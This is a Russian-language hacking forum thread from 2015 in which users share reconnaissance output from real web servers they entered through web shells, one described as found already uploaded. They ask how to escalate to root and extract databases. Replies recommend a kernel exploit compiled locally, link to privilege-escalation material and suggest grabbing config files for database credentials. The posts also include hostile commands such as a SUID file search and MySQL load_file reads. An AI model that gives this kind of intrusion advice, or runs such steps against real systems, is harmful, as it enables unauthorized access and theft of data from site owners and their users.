-rw-r--r-- 1 root root 165 Jun 11 2014 .vmlinuz-2.6.18-371.9.1.el5PAE.hmac

-rw-r--r-- 1 root root 161 Sep 17 2014 .vmlinuz-2.6.18-398.el5PAE.hmac
-rw-r--r-- 1 root root 161 Apr 7 20:53 .vmlinuz-2.6.18-404.el5PAE.hmac
-rw-r--r-- 1 root root 971511 Jan 6 2011 System.map-2.6.18-194.32.1.el5
-rw-r--r-- 1 root root 967675 Apr 2 2010 System.map-2.6.18-194.el5
-rw-r--r-- 1 root root 993118 Sep 26 2013 System.map-2.6.18-348.18.1.el5PAE
-rw-r--r-- 1 root root 993780 Dec 5 2013 System.map-2.6.18-371.3.1.el5PAE
-rw-r--r-- 1 root root 993835 Jun 11 2014 System.map-2.6.18-371.9.1.el5PAE
-rw-r--r-- 1 root root 993998 Sep 17 2014 System.map-2.6.18-398.el5PAE
-rw-r--r-- 1 root root 994152 Apr 7 20:53 System.map-2.6.18-404.el5PAE
-rw-r--r-- 1 root root 69598 Jan 6 2011 config-2.6.18-194.32.1.el5
-rw-r--r-- 1 root root 69593 Apr 2 2010 config-2.6.18-194.el5
-rw-r--r-- 1 root root 70337 Sep 26 2013 config-2.6.18-348.18.1.el5PAE
-rw-r--r-- 1 root root 70357 Dec 5 2013 config-2.6.18-371.3.1.el5PAE
-rw-r--r-- 1 root root 70357 Jun 11 2014 config-2.6.18-371.9.1.el5PAE
-rw-r--r-- 1 root root 70353 Sep 17 2014 config-2.6.18-398.el5PAE
-rw-r--r-- 1 root root 70353 Apr 7 20:53 config-2.6.18-404.el5PAE
drwxr-xr-x 2 root root 1024 May 4 2010 extlinux
drwxr-xr-x 2 root root 1024 Apr 8 13:07 grub
-rw------- 1 root root 2599913 Jan 25 2011 initrd-2.6.18-194.32.1.el5.img
-rw------- 1 root root 2569559 Jan 25 2011 initrd-2.6.18-194.el5.img
-rw------- 1 root root 2615526 Oct 14 2013 initrd-2.6.18-348.18.1.el5PAE.img
-rw------- 1 root root 2615834 Jan 24 2014 initrd-2.6.18-371.3.1.el5PAE.img
-rw------- 1 root root 2616679 Jun 12 2014 initrd-2.6.18-371.9.1.el5PAE.img
-rw------- 1 root root 2616919 Dec 2 2014 initrd-2.6.18-398.el5PAE.img
-rw------- 1 root root 2616967 Apr 8 13:07 initrd-2.6.18-404.el5PAE.img
drwx------ 2 root root 12288 Jan 1 2009 lost+found
-rw-r--r-- 1 root root 80032 Mar 12 2009 message
-rw-r--r-- 1 root root 111346 Jan 6 2011 symvers-2.6.18-194.32.1.el5.gz
-rw-r--r-- 1 root root 110979 Apr 2 2010 symvers-2.6.18-194.el5.gz
-rw-r--r-- 1 root root 117369 Sep 26 2013 symvers-2.6.18-348.18.1.el5PAE.gz
-rw-r--r-- 1 root root 117471 Dec 5 2013 symvers-2.6.18-371.3.1.el5PAE.gz
-rw-r--r-- 1 root root 117487 Jun 11 2014 symvers-2.6.18-371.9.1.el5PAE.gz
-rw-r--r-- 1 root root 117549 Sep 17 2014 symvers-2.6.18-398.el5PAE.gz
-rw-r--r-- 1 root root 117561 Apr 7 20:53 symvers-2.6.18-404.el5PAE.gz
-rw-r--r-- 1 root root 1877108 Jan 6 2011 vmlinuz-2.6.18-194.32.1.el5
-rw-r--r-- 1 root root 1875796 Apr 2 2010 vmlinuz-2.6.18-194.el5
-rw-r--r-- 1 root root 1908212 Sep 26 2013 vmlinuz-2.6.18-348.18.1.el5PAE
-rw-r--r-- 1 root root 1909108 Dec 5 2013 vmlinuz-2.6.18-371.3.1.el5PAE
-rw-r--r-- 1 root root 1909140 Jun 11 2014 vmlinuz-2.6.18-371.9.1.el5PAE
-rw-r--r-- 1 root root 1910164 Sep 17 2014 vmlinuz-2.6.18-398.el5PAE
-rw-r--r-- 1 root root 1910324 Apr 7 20:53 vmlinuz-2.6.18-404.el5PAE

mount

Code:
/dev/md3 on / type ext3 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/md4 on /tmp type ext3 (rw,noexec,nosuid,nodev,noatime)
/dev/md2 on /boot type ext3 (rw)
/dev/md1 on /var type ext3 (rw,noatime)
/dev/md0 on /hsphere type ext3 (rw,noatime,usrquota,data=writeback)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

df -h

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/md3 15G 6.8G 7.1G 49% /
/dev/md4 4.9G 2.6G 2.1G 56% /tmp
/dev/md2 198M 46M 143M 25% /boot
/dev/md1 436G 21G 393G 6% /var
/dev/md0 417G 135G 260G 35% /hsphere
tmpfs 5.9G 0 5.9G 0% /dev/shm

cat /etc/issue

Code:
CentOS release 5.5 (Final
Kernel \r on an \m

cat /proc/version

Code:
Linux version 2.6.18-371.3.1.el5PAE (mockbuild@builder10.centos.org) (gcc versio
n 4.1.2 20080704 (Red Hat 4.1.2-54)) #1 SMP Thu Dec 5 13:29:20 EST 2013

cat /proc/sys/vm/mmap_min_addr
4096
Использую этот эксполит
https://www.exploit-db.com/exploits/10613/
Но при его копиляции пишет что недостаточно прав gcc, можно это обойти ?gcc установлены права 750
И вопрос ,я правельный экполит выбрал?? Ешё только учусь.

1. Вы используете ядерный сплойт для 2009 года, а какого года ваша сборка? 0_o

2. Нет прав на gcc, компилируйте сплойт на локальной машине.

3. Что-то ядерное под вашу машину вряд ли есть, посмотрите/попробуйте http://www.openwall.com/lists/oss-security/2015/07/23/16

Xsite

13.08.2015, 21:11

Ребят подскажите пожалуйста ,чисто случайно наткнулся на уже залитый шел на сайте

Но он не дает ни заливать файлы ,ни читать

http://hkar.ru/D5S3

http://hkar.ru/D5S4

Code:
Linux ns5.hiwit.net 3.13.0-61-generic #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
total 34093
drwxr-xr-x 3 root root 400 Aug 11 04:52 .
drwxr-xr-x 24 root root 640 Aug 11 04:52 ..
-rw------- 1 root root 3391819 Jul 29 14:35 System.map-3.13.0-61-generic
-rw-r--r-- 1 root root 1165129 Jul 29 14:35 abi-3.13.0-61-generic
-rw-r--r-- 1 root root 165763 Jul 29 14:35 config-3.13.0-61-generic
drwxr-xr-x 2 root root 472 Aug 11 04:52 grub
-rw-r--r-- 1 root root 23777827 Aug 11 04:41 initrd.img-3.13.0-61-generic
-rw-r--r-- 1 root root 176500 Mar 12 2014 memtest86+.bin
-rw-r--r-- 1 root root 178176 Mar 12 2014 memtest86+.elf
-rw-r--r-- 1 root root 178680 Mar 12 2014 memtest86+_multiboot.bin
-rw------- 1 root root 5822208 Jul 29 14:35 vmlinuz-3.13.0-61-generic
При команде lls -la --full-time /lib (64) тишина
/dev/sda1 on / type reiserfs (rw,relatime,notail)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/sda2 on /home type reiserfs (rw,relatime)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 9.4G 4.4G 5.0G 47% /
none 4.0K 0 4.0K 0% /sys/fs/cgroup
udev 3.9G 12K 3.9G 1% /dev
tmpfs 799M 496K 798M 1% /run
none 5.0M 0 5.0M 0% /run/lock
none 3.9G 0 3.9G 0% /run/shm
none 100M 0 100M 0% /run/user
/dev/sda2 141G 51G 90G 37% /home
Ubuntu 14.04.3 LTS \n \l
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

ls -la cron.d, cron.hourly, cron.monthly, cron.weekly ничего не выводит

Linux version 3.13.0-61-generic (buildd@lgw01-50) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015
65536
/home/ah42713/web/www
ls -la /usr/bin/staprun ничего не выводит
find / -type f -perm -u+s -exec ls -la {} ; 2>/dev/null тишина

Тут даже больше вопрос ,как вытащить базу , а уже потом по рутать по возможности

powerOfthemind

16.08.2015, 15:20

Xsite said:
↑ (https://antichat.live/posts/3879793/)
Ребят подскажите пожалуйста ,чисто случайно наткнулся на уже залитый шел на сайте
Но он не дает ни заливать файлы ,ни читать
http://hkar.ru/D5S3
http://hkar.ru/D5S4

Code:
Linux ns5.hiwit.net 3.13.0-61-generic #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
total 34093
drwxr-xr-x 3 root root 400 Aug 11 04:52 .
drwxr-xr-x 24 root root 640 Aug 11 04:52 ..
-rw------- 1 root root 3391819 Jul 29 14:35 System.map-3.13.0-61-generic
-rw-r--r-- 1 root root 1165129 Jul 29 14:35 abi-3.13.0-61-generic
-rw-r--r-- 1 root root 165763 Jul 29 14:35 config-3.13.0-61-generic
drwxr-xr-x 2 root root 472 Aug 11 04:52 grub
-rw-r--r-- 1 root root 23777827 Aug 11 04:41 initrd.img-3.13.0-61-generic
-rw-r--r-- 1 root root 176500 Mar 12 2014 memtest86+.bin
-rw-r--r-- 1 root root 178176 Mar 12 2014 memtest86+.elf
-rw-r--r-- 1 root root 178680 Mar 12 2014 memtest86+_multiboot.bin
-rw------- 1 root root 5822208 Jul 29 14:35 vmlinuz-3.13.0-61-generic
При команде lls -la --full-time /lib (64) тишина
/dev/sda1 on / type reiserfs (rw,relatime,notail)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/sda2 on /home type reiserfs (rw,relatime)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 9.4G 4.4G 5.0G 47% /
none 4.0K 0 4.0K 0% /sys/fs/cgroup
udev 3.9G 12K 3.9G 1% /dev
tmpfs 799M 496K 798M 1% /run
none 5.0M 0 5.0M 0% /run/lock
none 3.9G 0 3.9G 0% /run/shm
none 100M 0 100M 0% /run/user
/dev/sda2 141G 51G 90G 37% /home
Ubuntu 14.04.3 LTS \n \l
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

ls -la cron.d, cron.hourly, cron.monthly, cron.weekly ничего не выводит

Linux version 3.13.0-61-generic (buildd@lgw01-50) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015
65536
/home/ah42713/web/www
ls -la /usr/bin/staprun ничего не выводит
find / -type f -perm -u+s -exec ls -la {} ; 2>/dev/null тишина

Тут даже больше вопрос ,как вытащить базу , а уже потом по рутать по возможности

По пробуй скачать конфиги (config.php, conn.php и так далее) базы,потом через шел зайти или myadmin найти что врятли получиться.

avonar

30.08.2015, 12:00

Везде упоминают о каком-то старом баге, который позволял эскалировать привилегии в Active directory, о чем может идти речь?

Valer4ik

14.09.2015, 07:24

Есть root доступ в mysql и такой серв

Code:
:/var/www/user/data $ uname -a
Linux usertoys.com.ua 3.2.0-4-amd64 #1 SMP Debian 3.2.68-1+deb7u1 x86_64 GNU/Linux
:/var/www/user/data $ ls -la /boot
total 15161
drwxr-xr-x 4 root root 1024 May 12 13:06 .
drwxr-xr-x 23 root root 4096 Jul 30 06:32 ..
-rw-r--r-- 1 root root 2114623 Apr 25 03:31 System.map-3.2.0-4-amd64
-rw-r--r-- 1 root root 129281 Apr 25 03:31 config-3.2.0-4-amd64
drwxr-xr-x 3 root root 5120 May 12 13:07 grub
-rw-r--r-- 1 root root 10347571 May 12 13:06 initrd.img-3.2.0-4-amd64
drwxr-xr-x 2 root root 12288 May 12 13:01 lost+found
-rw-r--r-- 1 root root 2842400 Apr 25 03:22 vmlinuz-3.2.0-4-amd64
:/var/www/user/data $ ls -la --full-time /lib
total 264
drwxr-xr-x 13 root root 4096 2015-05-16 00:32:27.064340794 +0300 .
drwxr-xr-x 23 root root 4096 2015-07-30 06:32:55.250270001 +0300 ..
lrwxrwxrwx 1 root root 21 2015-05-16 00:32:27.052340698 +0300 cpp -> /etc/alternatives/cpp
drwxr-xr-x 2 root root 4096 2015-05-12 13:05:25.243433001 +0300 discover
drwxr-xr-x 7 root root 4096 2015-05-12 13:03:48.463433001 +0300 firmware
drwxr-xr-x 2 root root 4096 2015-05-12 13:03:13.543433001 +0300 init
-rwxr-xr-x 1 root root 72184 2012-11-12 18:58:05.000000000 +0200 klibc-2xtYrByCrj5OEwaInv4tMSjej98.so
lrwxrwxrwx 1 root root 17 2013-03-01 15:55:02.000000000 +0200 libip4tc.so.0 -> libip4tc.so.0.1.0
-rw-r--r-- 1 root root 31384 2013-03-01 15:55:04.000000000 +0200 libip4tc.so.0.1.0
lrwxrwxrwx 1 root root 17 2013-03-01 15:55:02.000000000 +0200 libip6tc.so.0 -> libip6tc.so.0.1.0
-rw-r--r-- 1 root root 31448 2013-03-01 15:55:04.000000000 +0200 libip6tc.so.0.1.0
lrwxrwxrwx 1 root root 15 2013-03-01 15:55:02.000000000 +0200 libipq.so.0 -> libipq.so.0.0.0
-rw-r--r-- 1 root root 10544 2013-03-01 15:55:04.000000000 +0200 libipq.so.0.0.0
lrwxrwxrwx 1 root root 16 2013-03-01 15:55:02.000000000 +0200 libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r-- 1 root root 5928 2013-03-01 15:55:04.000000000 +0200 libiptc.so.0.0.0
lrwxrwxrwx 1 root root 19 2013-03-01 15:55:02.000000000 +0200 libxtables.so.7 -> libxtables.so.7.0.0
-rw-r--r-- 1 root root 47824 2013-03-01 15:55:04.000000000 +0200 libxtables.so.7.0.0
drwxr-xr-x 3 root root 4096 2015-05-12 13:03:13.911433001 +0300 lsb
drwxr-xr-x 2 root root 4096 2015-05-12 13:03:25.155433001 +0300 modprobe.d
drwxr-xr-x 3 root root 4096 2015-05-12 13:03:59.007433001 +0300 modules
drwxr-xr-x 3 root root 4096 2015-05-12 13:03:27.079433001 +0300 systemd
drwxr-xr-x 15 root root 4096 2015-05-12 13:03:06.719433001 +0300 terminfo
drwxr-xr-x 5 root root 4096 2015-05-12 13:03:27.463433001 +0300 udev
drwxr-xr-x 4 root root 12288 2015-05-29 10:37:18.893494371 +0300 x86_64-linux-gnu
drwxr-xr-x 2 root root 4096 2015-05-12 13:03:24.923433001 +0300 xtables
:/var/www/user/data $ mount
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=746519,mode=755 )
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode =000)
tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=598420k,mode=755)
/dev/disk/by-uuid/8038203e-749a-4f44-bc0c-032c3bb78470 on / type ext4 (rw,relatime,errors=remount-ro,user_xattr,barrier=1,data=ordered,usrquota,grpq uota)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /run/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=1301280k)
/dev/vda1 on /boot type ext2 (rw,relatime,errors=continue)
rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw,relatime)
:/var/www/user/data $ df -h
Filesystem Size Used Avail Use% Mounted on
rootfs 58G 26G 29G 48% /
udev 10M 0 10M 0% /dev
tmpfs 585M 232K 585M 1% /run
/dev/disk/by-uuid/8038203e-749a-4f44-bc0c-032c3bb78470 58G 26G 29G 48% /
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 1.3G 0 1.3G 0% /run/shm
/dev/vda1 89M 17M 67M 21% /boot
:/var/www/user/data $ cat /etc/issue
Debian GNU/Linux 7 \n \l
:/var/www/user/data $ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
:/var/www/user/data $ ls -la /etc/cron.d
total 20
drwxr-xr-x 2 root root 4096 Jun 15 13:23 .
drwxr-xr-x 93 root root 4096 Aug 28 09:27 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rw-r--r-- 1 root root 254 Jun 13 2012 awstats
-rw-r--r-- 1 root root 510 Mar 25 10:47 php5
:/var/www/user/data $ ls -la /etc/cron.hourly
total 12
drwxr-xr-x 2 root root 4096 May 12 13:03 .
drwxr-xr-x 93 root root 4096 Aug 28 09:27 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
:/var/www/user/data $ la -la /etc/cron.monthly
sh: 1: la: not found
:/var/www/user/data $ la -la /etc/cron.weekly
sh: 1: la: not found
:/var/www/user/data $ cat /etc/cron.hourly/*
cat: /etc/cron.hourly/*: No such file or directory
:/var/www/user/data $ cat /etc/cron.monthly/*
cat: /etc/cron.monthly/*: No such file or directory
:/var/www/user/data $ cat /etc/cron.weekly/*
#!/bin/sh
#
# man-db cron weekly

set -e

iosched_idle=
# Don't try to change I/O priority in a vserver or OpenVZ.
if ! egrep -q '(envID|VxID):.*[1-9]' /proc/self/status && \
([ ! -d /proc/vz ] || [ -d /proc/bc ]); then
dpkg_version="$(dpkg-query -W -f '${Version}' dpkg 2>/dev/null)"
if dpkg --compare-versions "$dpkg_version" ge 1.15.0; then
iosched_idle='--iosched idle'
fi
fi

if ! [ -d /var/cache/man ]; then
# Recover from deletion, per FHS.
mkdir -p /var/cache/man
chown man:root /var/cache/man || true
chmod 2755 /var/cache/man
fi

# regenerate man database
if [ -x /usr/bin/mandb ]; then
# --pidfile /dev/null so it always starts; mandb isn't really a daemon,
# but we want to start it like one.
start-stop-daemon --start --pidfile /dev/null \
--startas /usr/bin/mandb --oknodo --chuid man \
$iosched_idle \
-- --quiet
fi

exit 0
#!/bin/sh

RKHUNTER=/usr/bin/rkhunter

test -x $RKHUNTER || exit 0

# source our config
. /etc/default/rkhunter

case "$CRON_DB_UPDATE" in
[YyTt]*)

if [ ! -x /usr/bin/wget ] && [ ! -x /usr/bin/curl ] && [ ! -x /usr/bin/links ] && \
[ ! -x /usr/bin/elinks ] && [ ! -x /usr/bin/lynx ]; then
echo "No tool with which to download rkhunter updates was found on your system. Please install wget, curl, (e)links or lynx"
exit 1
fi

OUTFILE=`mktemp` || exit 1

case "$DB_UPDATE_EMAIL" in
[YyTt]*)
(
echo "Subject: [rkhunter] $(hostname -f) - Weekly database update"
echo "To: $REPORT_EMAIL"
echo ""
$RKHUNTER --versioncheck --nocolors --appendlog
$RKHUNTER --update --nocolors --appendlog
) | /usr/sbin/sendmail $REPORT_EMAIL
;;
*)
$RKHUNTER --versioncheck --appendlog 1>/dev/null 2>$OUTFILE
$RKHUNTER --update --appendlog 1>/dev/null 2>>$OUTFILE
;;
esac

if [ -s "$OUTFILE" ]; then
(
echo "Subject: [rkhunter] $(hostname -f) - Weekly rkhunter database update"
echo "To: $REPORT_EMAIL"
echo ""
cat $OUTFILE
) | /usr/sbin/sendmail $REPORT_EMAIL
fi
rm -f $OUTFILE
;;

*)
exit 0
;;
esac
:/var/www/user/data $ cat /proc/version
Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.68-1+deb7u1
:/var/www/user/data $ cat /proc/sys/vm/mmap_min_addr
65536
:/var/www/user/data $ pwd
/var/www/user/data
:/var/www/user/data $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
:/var/www/user/data $ id
uid=500(user) gid=500(user) groups=500(user),1000(mgrsecure)
:/var/www/user/data $

пробовал читать файлы из mysql но много не прочитал

select load_file('');

И из эксплоитов пробовал, (чекер показал)

- Kernel ia32syscall Emulation Privilege Escalation Language=c

- Sendpage Local Privilege Escalation Language=ruby**

- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) Language=c

- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit Language=c

- open-time Capability file_ns_capable() Privilege Escalation Language=c

- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability Language=c

ghost8

16.09.2015, 14:09

попробуй https://rdot.org/forum/showthread.php?t=3440

Valer4ik

18.09.2015, 13:43

ghost8 said:
↑ (https://antichat.live/posts/3891776/)
попробуй
https://rdot.org/forum/showthread.php?t=3440

Я пытался, но на серве нет fusermout

Bezlishke

08.10.2015, 22:06

Такие дела.пробывал связку. Но меня послало.

Code:
$ uname -a
Linux fortuna.timeweb.ru 3.10.82-timeweb #1 SMP Fri Jul 3 10:11:34 MSK 2015 x86_64 x86_64 x86_64 GNU/Linux
$ ls -la /boot
total 153444
drwxr-xr-x 3 root root 4096 Oct 8 06:28 .
drwxr-xr-x 28 root root 4096 Jul 21 06:26 ..
-rw-r--r-- 1 root root 3210565 Aug 26 2014 System.map-3.10.53-timeweb
-rw-r--r-- 1 root root 3210844 Oct 16 2014 System.map-3.10.58-timeweb
-rw-r--r-- 1 root root 3213729 Mar 3 2015 System.map-3.10.70-timeweb
-rw-r--r-- 1 root root 3213988 Jul 3 10:49 System.map-3.10.82-timeweb
-rw-r--r-- 1 root root 3214012 Oct 7 13:05 System.map-3.10.90-timeweb
-rw-r--r-- 1 root root 2911687 May 20 2013 System.map-3.2.45-timeweb
-rw-r--r-- 1 root root 132942 Aug 26 2014 config-3.10.53-timeweb
-rw-r--r-- 1 root root 133622 Oct 16 2014 config-3.10.58-timeweb
-rw-r--r-- 1 root root 134094 Mar 3 2015 config-3.10.70-timeweb
-rw-r--r-- 1 root root 134094 Jul 3 10:00 config-3.10.82-timeweb
-rw-r--r-- 1 root root 134094 Oct 7 12:17 config-3.10.90-timeweb
-rw-r--r-- 1 root root 129458 May 20 2013 config-3.2.45-timeweb
drwxr-xr-x 3 root root 12288 Oct 8 06:28 grub
-rw-r--r-- 1 root root 16856878 Sep 16 2014 initrd.img-3.10.53-timeweb
-rw-r--r-- 1 root root 17273047 Feb 18 2015 initrd.img-3.10.58-timeweb
-rw-r--r-- 1 root root 17273539 Mar 18 2015 initrd.img-3.10.70-timeweb
-rw-r--r-- 1 root root 17273177 Sep 29 06:25 initrd.img-3.10.82-timeweb
-rw-r--r-- 1 root root 17272293 Oct 8 06:28 initrd.img-3.10.90-timeweb
-rw-r--r-- 1 root root 15767803 Sep 18 2013 initrd.img-3.2.45-timeweb
-rw-r--r-- 1 root root 176764 Nov 27 2011 memtest86+.bin
-rw-r--r-- 1 root root 178944 Nov 27 2011 memtest86+_multiboot.bin
-rw-r--r-- 1 root root 5939488 Aug 26 2014 vmlinuz-3.10.53-timeweb
-rw-r--r-- 1 root root 5941120 Oct 16 2014 vmlinuz-3.10.58-timeweb
-rw-r--r-- 1 root root 5948224 Mar 3 2015 vmlinuz-3.10.70-timeweb
-rw-r--r-- 1 root root 5949952 Jul 3 10:49 vmlinuz-3.10.82-timeweb
-rw-r--r-- 1 root root 5951264 Oct 7 13:05 vmlinuz-3.10.90-timeweb
-rw-r--r-- 1 root root 5480816 May 20 2013 vmlinuz-3.2.45-timeweb
$ lls -la --full-time /lib64

$ lls -la --full-time /lib

$ mount
/dev/sda1 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
none on /tmp type tmpfs (rw,noexec,nosuid,nodev,noatime,size=4g)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /var/spool/exim4 type tmpfs (rw,noexec,nosuid,nodev,noatime,size=1g)
/dev/drbd0 on /home type ext4 (rw,nosuid,noatime,nodiratime,usrjquota=aquota.use r,jqfmt=vfsv0,usrquota,discard,_netdev)
//172.16.0.30/homes on /mnt/backup type cifs (rw,noexec,nosuid,nodev)
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 46G 24G 20G 55% /
udev 32G 12K 32G 1% /dev
none 4.0G 579M 3.5G 15% /tmp
tmpfs 6.3G 336K 6.3G 1% /run
none 5.0M 0 5.0M 0% /run/lock
none 32G 24K 32G 1% /run/shm
none 1.0G 7.7M 1017M 1% /var/spool/exim4
/dev/drbd0 1.5T 1.3T 170G 88% /home
$ cat /etc/issue
Ubuntu 12.04.5 LTS \n \l

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
$ ls -la cron.d
total 36
drwxr-xr-x 2 root root 4096 Jul 16 2014 .
drwxr-xr-x 138 root root 12288 Oct 8 21:02 ..
-rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
-rw-r--r-- 1 root root 589 Apr 11 2013 mdadm
-rw-r--r-- 1 root root 499 Aug 9 2013 php5
-rw-r----- 1 root root 116 Jul 16 2014 puppet_agent_restart
-rw-r--r-- 1 root root 396 Dec 16 2011 sysstat
$ ls -la cron.hourly
total 20
drwxr-xr-x 2 root root 4096 Aug 22 2013 .
drwxr-xr-x 138 root root 12288 Oct 8 21:02 ..
-rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
$ ls -la cron.monthly
total 28
drwxr-xr-x 2 root root 4096 Aug 23 2013 .
drwxr-xr-x 138 root root 12288 Oct 8 21:02 ..
-rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
-rwxr-xr-x 1 root root 1281 May 6 2011 acct
-rwxr-xr-x 1 root root 534 Mar 8 2012 debsums
$ ls -la cron.weekly
total 32
drwxr-xr-x 2 root root 4096 Oct 10 2014 .
drwxr-xr-x 138 root root 12288 Oct 8 21:02 ..
-rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder
-rwxr-xr-x 1 root root 730 Dec 31 2011 apt-xapian-index
-rwxr-xr-x 1 root root 533 Mar 8 2012 debsums
-rwxr-xr-x 1 root root 907 Dec 28 2012 man-db
$ cat /proc/version
